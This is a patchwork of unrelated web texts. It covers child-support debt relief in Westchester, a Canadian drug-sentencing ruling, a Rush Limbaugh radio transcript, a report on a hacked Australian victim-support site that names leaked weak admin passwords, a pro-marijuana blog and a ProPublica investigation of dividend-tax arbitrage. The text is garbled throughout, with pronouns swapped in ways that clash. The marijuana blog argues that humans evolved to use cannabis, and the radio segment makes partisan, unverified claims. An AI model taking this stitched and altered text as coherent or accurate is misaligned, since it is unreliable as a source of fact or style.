Officials in Westchester County , N.Y. , want to help low-income fathers who are behind in their child support payments .
`` These guys are n't deadbeats , '' says Kevin McGuire , the county 's social services commissioner . `` They 're dead broke . ''
In a 2006 study of nine states , 70 percent of late child support payments were owed by parents who made no more than $ 10,000 a year . For these parents , the average child support obligation equaled about 83 percent of their reported income , according to the Urban Institute .
Once child support debt piles up , interest can be added to it every month it goes unpaid . For some , the punishment is jail , which further limits their ability to pay . Nationally , about a third of child support is n't paid each year , and only 15 percent of related debt and interest gets collected .
In Westchester , officials see employment as the main solution for getting fathers to comply with child support orders . But job assistance programs alone had n't solved the problem in the past , and Joseph Kenner , the county 's deputy commissioner of social services , thought they knew why .
“ What I felt was missing was some kind of carrot , ” Kenner says .
In the county 's Responsible Employed Active Loving ( R.E.A.L ) Parenting Pilot for Stronger Families , the carrot is the opportunity for non-custodial parents to eliminate most of the debt they owe to the county government . ( It does not , however , affect debt they owe to families . )
Here 's how the program works : The county Department of Social Services recruited 25 volunteers -- unemployed fathers on public assistance who have child support debt anywhere from $ 2,000 to $ 80,000 -- to take 40 hours of classes over 10 weeks . The classes cover a range of topics , from financial management to parenting to career counseling . At the end of the 40 hours , the county reduces participants ' debt by 25 percent . That 's the first carrot .
If the fathers find a job and keep it for 90 days , they can get their debt reduced another 25 percent . And if the fathers keep up with their current child support payments for an entire year , they can get their debt reduced to $ 500 .
The result so far ? Almost three-fourths of the fathers will have their debt reduced . At least five are on track to complete all three milestones , having already attended the classes and kept a new job for at least 90 days . Another 12 have completed the classes but have n't met the program 's employment and child support payment goals yet .
Clinton Bess , one of the volunteers who are set to have their debt reduced to $ 500 , says their last few jobs did n't cover their child support obligations . “ My take-home pay was sometimes negative , ” they say . Bess now works as a motorman for the New York City Metropolitan Transportation Authority and as a street cleaner for the Yonkers Business Improvement District .
Westchester County is n't the only government testing the waters on this issue .
In Wisconsin , a debt forgiveness program made participating parents more likely to pay child support and pay down their debt than parents outside the program . Texas was also able to increase the frequency and consistency of child support payments by adding mandatory courses on parenting , budgeting and relationship skills to the workforce development program .
The R.E.A.L . Parenting pilot is an amalgam of these promising initiatives . The pilot 's strength , Kenner says , is that it does more than forgive debt . It also incorporates intensive case management , drawing lessons from a statewide debt forgiveness pilot conducted by New York 's Office of Temporary and Disability Assistance in 2009 .
Kenner and their boss , McGuire , tell the pilot 's participants that the program might one day go statewide -- information they hope will motivate them to succeed .
`` What you 're doing is going to help a lot of other guys in a lot of other parts of the state , '' McGuire told a group of fathers in early June . `` We have an investment in you . You are not just a name on a birth certificate . ''
Besides the potential financial benefits of the pilot , county leadership hope it will lead to stronger relationships between children and their parents . When parents are current on child support payments , research suggests they interact more with their children .
“ We owe it to our kids -- and we owe it to our dads who have fallen away -- to try and get them a second chance , ” says Westchester County Executive Robert Astorino .
Astorino , a Republican , noted that the pilot ought to appeal to people across the political spectrum . As a conservative , they like that the program rewards parents for finding employment and paying their current child support . Left-leaning officials in the county , they say , tell them they like its emphasis on second chances .
“ This is something in today 's climate , ” they say , “ that everybody can get behind . ''
Early life Edit
Frederick Jay Rubin was born in Long Beach , New York and grew up in Lido Beach , New York . Their father , Michael ( Mickey ) was a shoe wholesaler and their mother , Linda , a housewife . They are of Jewish descent . [ 4 ] While a student at Long Beach High School they befriended the school 's audiovisual department director Steve Freeman who gave them a few lessons in guitar playing and songwriting . They then played in a band with childhood friends Marc Greenhut , Carlos Ferreiro , and Joey Ferrante doing garage and school shows for town friends until Steve , an AV teacher , helped them create a punk band called The Pricks . Their biggest claim to fame was being thrown off the stage at CBGB after two songs for brawling with the heckling audience . These hecklers were friends of the band instructed to instigate a confrontation so as to get the show shut down and create a buzz . Somewhat anecdotally , this story was confirmed in an interview with music journalist Zane Lowe . [ 5 ] Although they had no authority in New York City , Rubin 's father traveled from Nassau County , New York , to Manhattan wearing their Long Beach auxiliary police uniform as they attempted to `` shut down '' the show .
Career Edit
Other ventures Edit
Production style Edit
Criticism Edit
Discography Edit
Filmography Edit
Awards and nominations Edit
B.C . provincial court Judge Joseph Galati has struck down today one of the key pieces of Prime Minister Stephen Harper 's tough-on-crime agenda , the one-year mandatory minimum sentence for drug traffickers previously convicted of the crime within the last 10 years .
It 's the second major setback for Harper 's get-tough agenda . In November , the Ontario Court of Appeal struck down three-year mandatory minimum sentences for possession of a loaded prohibited gun , declaring the law , part of the federal Conservatives ' 2008 omnibus bill , unconstitutional .
This latest case involves small-time Vancouver Downtown Eastside drug dealer Joseph Ryan Lloyd , whom the judge had earlier convicted of three counts of trafficking two grams of crack cocaine , six grams of methamphetamine and a half gram of heroin .
Under the new law , Galati had to sentence Lloyd to a minimum one year in jail . Instead , taking into account time served , they sentenced Lloyd to 191 days .
Court documents show Lloyd , who is 25 years old with a Grade 10 education , had 21 prior convictions that included fraud , forgery , theft , assault , possession of a prohibited weapon and a prior drug conviction .
Last March , Vancouver police stopped Lloyd for riding their bicycle on the sidewalk . When they searched him , police found a knife in a sheath and arrested them for breaching the conditions of their probation . That 's when they also found the drugs .
Galati says the charge and Lloyd 's record could support a sentence of 12 to 18 months , well within the range of the federal mandatory minimum sentence . But the judge was troubled by the lack of discretion in applying the sentencing law to low-level drug dealers such as Lloyd , who sell drugs to feed their own addiction .
Drug law casts too wide a net
Where addiction is involved , Galati says in their ruling , the mandatory one-year minimum drug sentence `` may not necessarily lead to the legislative objective of combating drug trafficking . ''
Galati says the drug law casts a wide net .
`` The circumstances related to convictions for designated substance offences run the gamut from very serious cases to more trivial ones and offenders range from career criminals .... to small offenders , '' Galati writes in their ruling .
`` Many offenders are of aboriginal heritage and their respective personal circumstances would otherwise warrant particular attention , '' says Galati , referring to Criminal Code provisions requiring the court to consider sanctions other than jail for aboriginal offenders .
In a previous ruling Galati found the one-year mandatory minimum sentence for drug traffickers amounted to cruel and unusual punishment . After hearing Crown arguments on Tuesday , they found it was not a reasonable limit under Section 1 of the Canadian Charter of Rights and Freedoms and struck it down .
Lloyd 's lawyer David Fai says it 's a good decision on a bad law .
`` In this neighbourhood where we are , there 's a lot of people here with prior convictions in the last 10 years that are addicts that are sharing with their friends or selling small amounts to support their addiction , '' said Fai . `` They 'd all be sent to jail for a minimum of one year under this legislation , so instead of harm reduction we 're going to sweep them all into jail . ''
The Crown says it will appeal Galati 's ruling .
Advice on some topics on the internet can be so laughably bad . One example that immediately comes to mind is finding a job . How many times have you heard people say the same old tired advice – “ Network ! ” “ Update your resume ! ” “ Use social media ! ”
Another , I 'm sorry to say , is organic chemistry . Here 's a recent example of a question from r/chemistry :
“ I 'm an undergrad and need to take Organic Chemistry as one of the pre-requisites . I have a few weeks to prepare . I 'm wondering what concepts I should brush up on/be strong in so I can be ready to hit the ground running and not get overwhelmed . ”
Here 's some of the sage advice that was offered :
Just start reading your textbook
Get yourself a physical molecule set , and use it .
Read every day and PRACTICE your mechanisms .
What 's wrong with that , you might ask ? Are n't these all good things to do ?
Yes , of course they are . But it 's lazy advice . One of the most common problems a beginner in any field has is overwhelmed . “ Where do I start ? ” is one of the most common questions I get around this time of year .
“ Just read the textbook ” is not specific enough advice for someone in this situation .
It 's possible to craft a 100x more useful answer with only a few minutes work .
See , taking an organic chemistry course is like climbing up Machu Picchu . There 's a well-worn path to the top , and with few exceptions , everybody takes it . Across the country , organic chemistry courses follow a very similar progression of chapters/concepts , and you just need to stay on the path and keep climbing . In the first 2 or 3 weeks , no matter what college or university you are studying at , expect to see the following topics : chemical bonding , dipoles , intermolecular forces , resonance and acid-base chemistry .
With that in mind , here is a list of specific skills to acquire and concepts to learn for the first few weeks .
I can say that there is a very strong likelihood that these exact skills will be tested on your first midterm . And after that , it will be assumed that you understand these skills , because the entire rest of Org 1 and Org 2 is built on them .
So now , instead of one , vague task “ preparing for orgo ” – there are now 6 specific study goals : line drawings , bonding , charge/dipoles , intermolecular forces , acid-base , and resonance .
Divide and conquer .
You ca n't prepare for organic chemistry in a day . But if you spend a day or two on each of these topics , for an hour or two per day , by the end of the two weeks you 'll be in good shape .
Related Posts :
GOP Calls Out Clinton 's Bony Finger Wag as Character Reference for Obama
RUSH : Hey , I like this , folks . CNN : “ Bill Clinton 's speech at the Democratic National Convention on Wednesday night reminded at least one Republican of another time the former president stepped before the microphones . Former California Gov . Pete Wilson said Thursday at a fundraiser for GOP vice presidential candidate Paul Ryan that Clinton 's finger shake was reminiscent of the time they denied engaging in sexual behavior with a White House intern . ”
Remember them shaking that bony finger ? He 's up there shaking that bony finger at the convention . It bothered me . And Pete Wilson 's right . ( imitating Clinton ) “ I never had sex with that woman , Ms. Lewinsky , not a single time , and I never asked anybody to lie , not once. ” This is the guy doing character references for Barack Obama , and Pete Wilson of all people , does n't matter , it 's great . Finally somebody out fights back against the Clinton speech , which supposedly owned the convention , it was the greatest thing under the sun .
This is the kind of stuff that 's gon na have to happen , folks . We ca n't rely on my perception that I just shared with you carrying the day . It 's gon na have to be told . The Romney campaign is going to have to campaign . The Romney campaign is gon na have to burnish Obama 's record in the minds of every voter in this country . They 're gon na have to highlight this unemployment news . They 're gon na have to broadcast it . They 're gon na have to focus on it : the dismal economic performance ; the drop from 55 to 51,000 in average family income ; the number of people on food stamps .
The campaign ca n't go lax . The campaign ca n't count on talk radio to carry the day . They ca n't count on public perception of the Democrat convention , because I do n't know how many people saw it the way I did . I 'm just telling you how I saw it . I know a lot of people still live in fear that no matter what the reality is , the left can spin it so that the public is lied to and believes the lies . I know people believe that . I know that no matter how bad Obama 's speech was , people on our side still think that it can be spun and presented as the best speech he 's ever made .
Although it is n't being spun that way .
Nobody 's even trying that .
I mean , not even Debbie “ Blabbermouth ” Schultz went there ! They did n't even try it . But that 's great opportunity . They had all that time last night to go out and make the best case , to seize the moment , to try to redefine this race to be anything they want it to be — and what did they do ? It was stunning how incompetent it ended up being last night . How un-smart , how un-cool . It was striking to me . It really was . I ca n't emphasize enough that I literally felt physically ill before it started . It was new . I 've not felt that way before .
But it ended up everything was fine and dandy when it was over .
BREAK TRANSCRIPT
RUSH : You know , I tell you , I like the idea of Pete Wilson calling Clinton out . I like the Republicans calling Clinton out . And the unemployment numbers have given the Republicans an issue now to get energized on , and they 're doing that . But , folks , you watch Bill Clinton , and a woman says to you , like they say to Alex Castellanos , “ Golly , you know what ? I watched Clinton last night , and I want to vote for Clinton , and I want to sleep with Clinton. ” That is the actual War on Women and an insult to their intelligence . Here is a guy , when you boil it all down , who has mistreated women , from interns to their wife , and the Democrat Party throws them up as somebody to fawn after and admire .
BREAK TRANSCRIPT
RUSH : Tom in Orlando , as we go back to the phones , Open Line Friday . Thank you very much for waiting . Hi .
CALLER : Hi , Rush . Longtime , first-time . Unlike your earlier caller , I was feeling good last night and fully prepared just to relax . I knew we were gon na hear nothing but BS , lies , distortions . And we did n't even make it through the introductory video for Barack Obama before I was out of my chair yelling at the TV . Bill Clinton , in talking about Barack Obama and the Osama bin Laden decision , actually said that when they heard about it , they sat there and thought , “ Gee , I wonder , when I was in office , if I was presented with the same opportunity , if I woulda had the guts that this Barack Obama had in pulling the trigger on Osama bin Laden. ” I was screaming at the TV saying , “ You did ! You did ! In 1999 , you could have taken them out , and you specifically did not , and 3,000 of our fellow citizens died as a result. ” So , I figured , “ Just leave it to Billy Jeff to send you out of your chair . ”
RUSH : I must admit , I did n't see the introductory video . I missed it . I knew it was gon na have the same character witnesses . I really , unlike you — I 'm not exaggerating — was feeling ill , sick to my stomach . I just felt like I could go to sleep , blah , depressed . Because I knew what was coming like you did . I was worried about people believing this crap . It means that there are so many damn morons in this country , and that just depresses me , but I did not see Clinton . Did Clinton actually say ( impression ) , “ You know , I wonder if I 'd have the guts to have pulled the trigger like this brave president did when I was presented with the opportunity to get bin Laden ” ? Did they say that ?
CALLER : They said that . It 's in the introductory video .
RUSH : You 've got ta be kidding ! They had two chances . The Sudanese offered us bin Laden without firing a shot , and Clinton turned them down . And then if you remember the movie The Path to 9/11 that Disney edited on Clinton 's demand — and they 've never released the DVD of this movie . Now , I ( a powerful , influential member of the media ) have the DVD because I know the screenwriter , Cyrus Nowrasteh .
That movie makes it clear that they had Osama dead to rights . Our guys had Osama dead to rights . We had them in the shot , had them in the sights , and because there were women and children at the mosque or wherever bin Laden was , Richard Clark told Clinton , “ Do n't take the shot. ” So you 're right . But let me tell you what Clinton 's doing with this . This is being a loyal Democrat . I think Clinton 's doing everything to set Hillary up for 2016 .
Make no mistake : One of the happiest guys in this country would be Bill Clinton if Obama loses . Now , Obama does n't have to lose to set Hillary up for 2016 . But it would make it a lot easier if she 's running against a Republican incumbent . If Obama wins , at that point people want a change of party no matter what 's going on , usually . It 's a rare exception when that does n't happen . I can understand why you jumped out of your chair on that . Thanks for the call , Tom .
Australia to list Nigerian militant group Boko Haram as terrorist organisation
Updated
Australia will list the Islamic militant group Boko Haram as a terrorist organisation in response to the recent kidnapping of more than 200 schoolgirls in Nigeria .
Prime Minister Tony Abbott announced the plan in Parliament today , saying the whole world was transfixed and horrified by the event .
`` The organisation Boko Haram is reportedly responsible - in addition to this - for the deaths of some 300 people in north-east Nigeria in various terrorist incidents ... today I announce that the Government is taking steps to commence the process of banning Boko Haram as a terrorist organisation , '' they said .
`` In banning Boko Haram as a terrorist organisation , Australia would be acting consistently with Nigeria and also with our international partners , including the United States , the United Kingdom , Canada and New Zealand . ''
Opposition Leader Bill Shorten confirmed the Labor Party would support the move .
What is Boko Haram ? Boko Haram , which means `` Western education is sinful '' , is loosely modelled on the Taliban movement in Afghanistan .
The group considers all who do not follow its strict ideology as infidels , whether they are Christian or Muslim .
It demands the adoption of Sharia law in all of Nigeria . Read more
`` The Labor Opposition 's extremely concerned about the fate of more than 200 girls kidnapped from a boarding school in northern Nigeria in mid-April , '' they said .
`` This is truly a horrific situation . It would be every parent 's worst nightmare . The president of Nigeria has called on the international community to help do what we can to rescue these girls .
`` The Opposition was advised the Government was considering making this listing immediately before Question Time today . We offer every support possible to the Abbott Government , we must do all that we can to assist . ''
According to the Attorney-General 's Department it is an offence to be a member of a terrorist organisation , recruit other members , train members , acquire funds or provide support to an organisation listed as a terrorist group .
Anyone guilty of terrorist organisation offences can face up to 25 years imprisonment .
Currently , Australia has 18 organisations officially listed as terrorist groups . A full list of terrorist organisations can be found at the Australian National Security website .
After being accused of a sluggish response to the kidnapping , the Nigerian government has now sent thousands of troops to the region and says it is ready to talk to Boko Haram about an offer to exchange the schoolgirls for Islamic militant prisoners .
This week Boko Haram released a video showing about 130 girls wearing hijabs and chanting the Koran .
The group 's leader , Abubakar Shekau , said they would not order the release of the students until the Nigerian government released all militant prisoners .
Senior Nigerian government minister Tanimu Turaki said dialogue was the preferred option , however they said when the government had tried to talk to Boko Haram before , the group had complained that they were talking to the wrong people and so the meetings failed .
The minister said the Islamists should publicly name delegates they trust , then the government would engage with them .
The US and Britain also have teams on the ground to help with the search for the schoolgirls .
The US State Department said Washington had sent in military , law enforcement and development experts .
Britain 's minister for Africa , Mark Simmonds , will travel to the Nigerian capital this week for talks on further assistance , the foreign office in London said .
Topics : terrorism , unrest-conflict-and-war , religion-and-beliefs , defence-and-national-security , australia , nigeria
First posted
Once again the Australian government has been hacked and as a. result . data was leaked which has exposed the fact that the administration have been setting and using passwords that could be guessed by anyone . The attack which was carried out by @ Venomsec had targeted an Canberra based website for victim support ( victimsupport.act.gov.au ) .
Victim Support ACT is a service that can help victims of crime to cope with the impact of what has happened , and can help them access their rights and entitlements . Victim Support ACT has two main services . The Victims Service Scheme ( VSS ) provides support , counselling and other services . The Justice Advocacy Unit ( JAU ) will help with information , advocacy and assistance with the criminal justice system , your rights and entitlements .
The attacked originally happened a few days ago and Google and pastebin had removed all traces of it before anyone had really seen it . We asked @ VenomSec for a copy fo this leak and as a result we have discovered that the Australian government is allowing its workers who control websites to use passwords such as `` test123 '' or `` l3tm31n '' ( let me in ) which are both commonly used within password lists for brutt forcing . As well as the weak passwords its come to light that they store them in plain text , so if what has happened it means that anyone that views this leak will be able to see the full login credentials of the websites administration . The contained only a 3 administration accounts but once again this just raises so many questions for the Australian government as how this website was allowed to be setup the way it is . At time of publishing the website appeared to be offline . https : //pastebin.com/XFU9Gifi https : //ozdc.net/archives.php ? aid=3437
The Islamic State of Iraq and Syria ( ISIS ) jihadist on Tuesday freed more than 70 Kurdish school children its fighters kidnapped in northern Syria in May , the Syrian Observatory for Human Rights said .
The Britain-based group said parents had reported the release of the children , who are believed to be aged between 13 and 15 .
The group of 70 were among 153 school children , most of them boys , abducted by ISIS jihadists on May 29 in the northern province of Aleppo .
Infographic : ISIS frees kidnapped Kurdish students ( Design by Farwa Rizwan/ Al Arabiya News )
They were intercepted and taken hostage en route to their hometown of Ain al-Arab after sitting school exams in Aleppo city .
They were kidnapped around the area of Minbej , which has been targeted in recent days in air strikes by a U.S.-led coalition fighting jihadists .
In the weeks after the children were abducted , five students managed to escape and another 37 were released in batches , including the 10 girls among the group , the Observatory said .
There were no immediate details on why the group decided to free the 70 additional hostages on Tuesday , and the Observatory said around 30 more children were still being held .
It said ISIS was refusing to hand over the 30 children because it said they had relatives in a key Kurdish party opposed to the jihadist group .
Ain al-Arab , known to the Kurds as Kobane , is now a major battleground between Kurdish fighters and ISIS .
Located strategically on the Syria-Turkey border , it is the country 's third biggest Kurdish town .
ISIS fighters have been advancing towards it for the past two weeks , and are now just three kilometers ( less than two miles ) from the town in places , according to the Observatory .
The fighting has prompted a mass exodus of residents in the area , with at least 160,000 fleeing over the border into Turkey .
Last Update : Wednesday , 1 October 2014 KSA 13:25 - GMT 10:25
Earlier this year , Maine senators called on the state Supreme Court to give an advisory opinion on the constitutionality of ranked choice voting as it was passed by voters in November 2016 for state and federal elections . A responsive brief has now been filed by Marshall J. Tinkle in favor of the ranked choice voting ballot initiative .
Opponents in the legislature argued that ranked choice voting violates constitutional provisions that require a plurality ( or simple plurality ) vote to decide who wins statewide elections . Further , opponents raised the argument that ranked choice voting can not be implemented because should it be ruled unconstitutional , it would create “ havoc ” in elections and a “ constitutional and political crisis . ”
In their responsive brief , Tinkle says the court should decline to answer these questions because there is no evidence to support the claims and opponents of ranked choice voting were asking the court to do things that go against the role of the judiciary . Below are some key takeaways from the responsive brief .
Story continues below Go Beyond the Two-Sided Narrative ! Get IVN 's weekly round-up of news and information for independent-minded voters in your inbox . Thanks for signing up ! An unknown error occured : ( Please try again later First Name * Last Name * Email Address * I accept IVN 's terms and conditions ? Sign Up
On the question that ranked choice voting would eventually upend elections , the brief says :
“ First of all , the Act must be regarded as valid “ until otherwise declared by the court. ” [ … ] Regardless of whether the Justices answer the Questions , the officials charged with implementing the Act will be obliged to carry out its dictates pursuant to their duties to uphold the laws of Maine unless and until the Court declares it unconstitutional . [ … ] There will be no reason to delay declaring the winners of ranked-choice voting elections or swearing them in…. ” “ Secondly , there is no reason to assume that the Act ever will be declared unconstitutional , not only because of the strong presumption of constitutionality and the policy against finding laws unconstitutional unless strictly necessary but also because of all the convincing arguments that have been offered in favor of the Act 's constitutionality . But even if a court were to deem the Act in conflict with Maine 's supreme law after elected officials took office , that would scarcely precipitate a crisis . ”
On the question of ranked choice voting being constitutional , the brief says :
“ The forces arrayed against ranked-choice voting are asking the Justices to adopt the construction that would most likely put the Act in conflict with the Constitution . That is the antithesis of what a court examining the constitutionality of legislation is required to do. ” “ [ The state constitution ] broadly lays out a few basic steps in the ballot aggregation process designed to foster accuracy , transparency , and integrity so that the election results will reflect the will of the electors . There is no evidence that ranked-choice voting will impede any of these goals . To the contrary , it is designed to better reflect the popular will in the election results . ”
Read the full brief :
Photo Credit : jiawangkun / shutterstock.com
A book has come to my attention which may be of importance to my brothers in the legalization movement . The book suggests that over the eons of time , human beings evolved to be potheads .
Yes , you read that right . Over the eons of history , throughout our many different evolutions and changes to make us more suitable for survival in this cruel and harsh world , and one of them was that our bodies ( especially our brains ) have evolved to more efficiently receive the effects of using ( be it through smoke or ingestion ) marijuana .
In The Botany of Desire , the author Michael Pollan explains how the human brain has evolved to experience the marijuana 's high . According to Pollan , much like the brain is `` pre-wired '' to receive the chemicals of endorphins and serotonin , so too is it prewired to receive the cannaboids ( chemicals , including the high inducing THC , found in marijuana ) . Pollan claims that there are `` Cannaboid receptors '' located all over the body allowing the whole body to experience the 'high '' usage of marijuana produces .
But why take my words for it ...
In 1988 , Allyn Howlett , a researcher at the St. Louis University Medical School , discovered a specific receptor for THC in the brain -- a type of nerve cell that THC binds to like a molecular key in a lock , causing it to activate . Receptor cells form part of a neuronal network ; the brain systems involving dopamine , serotonin and the endorphins are three such networks . When a cell in a network is activated by its chemical key , it responds by doing a variety of things : sending a chemical signal to other cells , switching a gene on or off , or becoming more or less active . Depending on the network involved , this process can trigger cognitive , behavioral or psychological changes . Howlett 's discovery pointed to the existence of a new network in the brain .
The cannabinoid receptors Howlett found showed up in vast numbers all over the brain ( as well as in the immune and reproductive systems ) though they were clustered in regions responsible for the mental processes that marijuana is known to alter : the cerebral cortex ( the locus of higher-order thought ) , the hippocampus ( memory ) , the basal ganglia ( movement ) , and the amygdala ( emotions ) . Curiously , the one neurological address where cannabinoid receptors did n't show up was in the brain stem , which regulates involuntary functions such as circulation and respiration . This might explain the remarkably low toxicity of cannabis and the fact that no one is known to have ever died from an overdose .
On the assumption that the human brain would not have evolved a special structure for the express purpose of getting itself high on marijuana , researchers hypothesized that the brain must manufacture its own THC-like chemical for some as-yet-unknown purpose . ... In 1992 , some thirty years after their discovery of THC , Raphael Mechoulam ( working with a collaborator , William Devane ) found it : the brain 's own endogenous cannabinoid . They named it `` anandamide , '' from the Sanskrit word for `` inner bliss . ''
* * excerpt taken from The Botany of Desire
Wow ... Take that DARE ...
Human beings are literally born to smoke pot ...
And here I always thought I smoked pot because it made TV more entertaining ...
For supporters of the medicinal ( and recreational ) usage of marijuana , this should come as welcomed news . For decades , the `` lie '' being shouted from the ivory towers and bully pulpits of this land has been about the dangers of smoking marijuana . But one would think that if the drug was as toxic to humanity as those keeping it illegal claim it is then why would our brains evolve to maximize its usage ? Would not something so detrimental continue to be toxic to our systems , like alcohol and opium have ( both of which have been used throughout history much like marijuana ) . We should note , if you believe you are an addict you can easily find help with marijuana dependence treatment .
Not to mention that the mere fact that the brain has evolved to maximize the usage of marijuana would imply that throughout our species ' long history there had to have been a whole lot of humans smoking a whole lot of pot for a very long time and had to have greatly benefited from this usage . At least enough to have gone through the extensive process of changing its chemical receptors to better receive the drug .
Why , it would appear to me that it is as if we , as a species , are intended to use marijuana ( be it through natural or cultural design ) in order to reap it 's benefits . And if we are in fact intended to use something ... something that apparently we have been using throughout history ... then how exactly is that something outlawed currently because of its stated harm to us when it clearly seems the contrary .
Weird , huh ...
( At this time , I would also like to tip my cap to our friends in the `` Intelligent Design '' crowd , many of who are usually against movements to legalize marijuana . It would appear to me that we are endowed by our Creator ( whomever it may be ) to smoke pot . And who are we to go against the designs of our Creator ... )
For more information ( a well as a more in depth look at the brain 's evolution to accept marijuana , check out The Botany of Desire , available at fine bookstores everywhere ...
Goldman Sachs , Citigroup , Merrill Lynch and other international banks have profited for years by arranging short-term loans of stock in Danish companies , a maneuver that has helped shareholders but deprived Denmark of substantial tax revenues .
With the banks ' help , stock owners avoid paying Danish authorities the dividend taxes they would otherwise owe on their holdings of companies like Maersk , Novo Nordisk , Danske Bank , Tryg and Carlsberg , among others .
They do so by lending the shares to banks that temporarily transfer them to other investors with low or no tax obligations around the time when the dividend is paid . The terms are hedged and arranged months in advance . After dividend time , the borrowed shares are returned , and the tax savings are shared among the investors and banks that arranged the trades .
The maneuver — known as dividend arbitrage , or “ div-arb ” — cost Denmark about 400 million Danish crowns ( $ 60 million ) in lost taxes last year alone , according to an estimate that we asked CEPOS , a Danish think tank , to provide for this article
For a country of 5.7 million , the lost revenue is significant : It equals roughly 1.1 percent of the budget deficit of the Danish government last year , or about 70 Danish crowns ( $ 10 ) for each resident .
The tax-avoidance trades are detailed in confidential documents that ProPublica examined in collaboration with the Danish business daily Børsen . The documents include trade logs , emails , chat messages and marketing materials that show how such trades happen in Denmark and various other countries .
For the first time , the documents reveal who is engaged in this kind of tax avoidance , which has already drawn scrutiny from regulators and lawmakers in Germany as they try to prevent future losses to taxpayers .
The documents make clear that the trades – which are also known as “ yield enhancement ” – are conducted for the purpose of avoiding dividend taxes .
One client memo describes yield enhancement as a short-term loan of shares owned by a tax-liable shareholder to another investor with a lower rate of withholding or no tax at all . The tax-exempt investor gets the dividend tax-free or is able to claim a refund from tax authorities . The difference between what would have been owed and what was actually paid is then “ split between the lender and the borrower , ” the memo says . In another document , the trades are described simply as a method to “ recapture ” dividend taxes .
The papers disclose the specific Danish shares used in these trades . For instance , in April 2014 , U.S. investment fund manager Vanguard lent 1,750 shares of shipping company Maersk with a market value of more than $ 20 million to unknown investors through Goldman Sachs and Merrill Lynch .
These share loans lasted no longer than 14 days , during which Maersk , one of Denmark 's largest corporations , paid out 280 Danish crowns ( $ 41.6 ) per share in dividends . Because the Vanguard funds are based outside of Denmark , they would normally lose 27 percent of the dividend to taxes , and thus receive only 73 percent of the total dividend . That comes out to 204.4 Danish crowns ( $ 30.3 ) per share . Lending the shares allowed the Vanguard funds to avoid paying the dividend tax , saving 75.6 Danish crowns ( $ 11.3 ) per share .
Altogether , that comes to a loss of 132,300 Danish crowns to Denmark ( $ 19,642 ) . Of that amount , the Vanguard funds got to keep about 77,800 in tax savings they would n't otherwise get and the remaining 54,500 crowns went to large banks and the unknown investors who participated in the deal . Only Danish taxpayers lost .
Wall Street Stock Loans Drain $ 1 Billion a Year From German Taxpayers Carefully timed deals help big money managers skirt dividend taxes in 20 countries , confidential documents show . Read the story . Help Us Investigate Do you have a tip or documents about who helps investors avoid dividend taxes ? You can confidentially share records with us using our SecureDrop system .
When Danish companies pay out dividends each spring , hundreds of these trades are arranged by various international banks representing lenders and borrowers of shares . Big baskets of various Danish stocks or individual stocks with attractive dividends are assembled by bankers and put out for bidding to various counterparties , documents show .
Vanguard declined to comment for this story , but the company has previously told ProPublica that “ securities lending is a widely accepted practice that we prudently employ to augment fund returns to the benefit of our clients . ”
Goldman Sachs and Merrill Lynch declined to comment .
Besides Goldman Sachs and Merrill Lynch , other banks that participate in Danish div-arb deals include Deutsche Bank , UBS , JPMorgan and Citigroup , according to the documents .
The banks declined to comment except for Deutsche Bank , which said its transactions follow all applicable tax laws and reporting obligations in the countries where the bank operates .
The div-arb deals in question only involve refunds of taxes which had actually been withheld . Last year , the Danish public was shaken when Danish tax authorities disclosed they had paid out billions of crowns in refunds for dividend taxes that had never been paid . Those transactions prompted the Danish government to launch fraud investigations and halt processing refunds of taxes paid on dividends .
Under heavy scrutiny , the refunds slowly started again in March . But it 's unclear whether sufficient safeguards have been put in place against div-arb trades as authorities seem unaware of transactions like the ones reviewed by ProPublica and Børsen .
The Danish Ministry of Taxation said in an email that it “ is not aware of such practice at this point , ” but that it is “ currently investigating ” banks ' share lending activities with a subsidiary agency known as SKAT , the Danish Tax Authority .
A working group convened by the regulators recently concluded that the borrower of a share is not entitled to a tax reclaim , casting doubt on the legality of any form of div-arb trades in Denmark .
Danish courts agree . The Danish National Tax Tribunal – the highest administrative court for tax matters in Denmark – ruled in 2004 that lending of a share does not change the fact that the original owner is obliged to pay the dividend tax .
“ Taxwise , we have to maintain that the lender basically remains the owner of the shares . So , if the lender 's tax rate is 27 percent , then 27 percent should be withheld in taxes . That 's the case law in Denmark , ” says Erik Banner-Voigt , partner in the Danish law firm Bruun & Hjejle and a specialist in international tax law .
In May ProPublica revealed similar transactions in Germany together with Handelsblatt , German broadcaster ARD and The Washington Post . ProPublica conservatively estimated div-arb cost German taxpayers about $ 1 billion a year . Afterwards , Germany 's Commerzbank – which had been bailed out by taxpayers during the financial crisis – promised to stop facilitating div-arb trades . The decision came as the Frankfurt general prosecutor 's office opened an investigation into the bank 's activities .
“ We are pulling out of this legal business because it is no longer socially accepted , ” Commerzbank board member Michael Reuther said in an interview with Germany 's Bild newspaper .
In June , German lawmakers passed a law that effectively shut down div-arb in Germany , which had been the biggest market for such deals .
But it 's still possible to book such deals in many other markets , including , it seems , Denmark .
The Danish State Lost a Fortune in Record Maersk Dividend
Though the individual sums may seem small , there is a lot of money involved in div-arb deals , especially for big corporations like Maersk .
On April 7 , 2015 , Maersk paid out 1,971 Danish crowns per share ( $ 293 ) to its investors in two payments that together added up to one of the biggest dividends in Danish history . The massive payment followed the sale of the conglomerate 's stake in Danske Bank .
A few days before the dividend was paid out , 1.3 million Maersk shares were on loan , according to data from S & P Global Market Intelligence – apparently with the sole purpose of avoiding the Danish withholding tax .
Altogether , around 6 percent of Maersk 's shares were on loan when the dividend was paid out to shareholders of record . The amount was unusually high : Less than 0.5 percent of the shares were on loan in the three months before and after the dividend payment , stock lending data from S & P shows .
“ The best explanation is , that it has to do with taxes , ” says Otto Brøns-Petersen , former director at the Danish Tax Ministry and now head of research at CEPOS , the Danish think tank .
Denmark lost 350 million Danish crowns ( $ 52 million ) in tax revenue because of the Maersk share loans , according to a CEPOS estimate for Børsen based on the S & P data .
The Maersk shares were not the only ones on loan over the dividend record date , when shareholders are identified for payment . In 2015 , similar surges are visible in biotech giant Novozymes , jewelry maker Pandora , wind turbine producer Vestas , insurance provider Tryg and others , S & P stock loan data for Denmark 's top 20 most-traded stocks shows .
Altogether , CEPOS estimated that Denmark lost 400 million crowns ( $ 60 million ) because of dividend arbitrage in 2015 . CEPOS 's Brøns-Petersen said several assumptions used to craft the estimate could make the figure higher or lower .
S & P would only provide a tally of shares on loan in any security as of the first of each month , making it impossible to identify spikes in lending for companies that pay dividends later in the month . Because of this , some of the potential losses do not show up in the analysis .
The estimate also assumes a tax rate of 15 percent on dividend payments , which is only available to foreign investors covered by tax treaties with Denmark . Investors not covered by such treaties can avoid a 27 percent tax bill by lending out their shares around dividend time .
